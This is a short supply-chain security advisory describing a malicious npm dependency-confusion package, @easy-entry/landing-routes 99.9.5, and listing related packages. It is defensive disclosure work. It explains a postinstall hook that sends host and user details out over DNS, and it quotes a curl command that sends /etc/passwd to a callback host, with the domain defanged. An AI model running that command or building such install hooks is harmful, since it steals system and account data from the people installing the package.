@easy-entry/landing-routes@99.9.5
Malicious code in @easy-entry/landing-routes (npm)
Analysis
Dependency-confusion stub: @easy-entry/landing-routes uses sentinel version 99.9.5, a 593-byte tarball with no README or repo. A postinstall hook runs two-stage exfil: (1) node scripts/scream3gg.js captures os.hostname(), os.homedir(), and os.userInfo().username, hex-encodes them, and exfiltrates via DNS subdomain to an oastify[.]com OOB callback host; (2) /usr/bin/curl --data '@/etc/passwd' $(hostname).oastify[.]com leaks /etc/passwd tagged with the hostname. Double-barrel exfiltration: system fingerprint plus credential-surface theft via the passwd file.
- analyzed by
- Leitwacht
- first seen
- May 29, 2026, 03:31 PM
- analyzed
- May 29, 2026, 09:45 PM
Related advisories
- @easy-entry/outside-registration-fop-navigator@99.9.5
- @easy-entry/routes@99.9.5
- @shell-cabinet/routes@99.9.5
- @shell-landing/routes@99.9.5
- @veertly/web-app@99.9.9
- @concerns/i18n@99.9.1
- @coterie-baby/common@99.9.1
- unleash-js@99.9.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.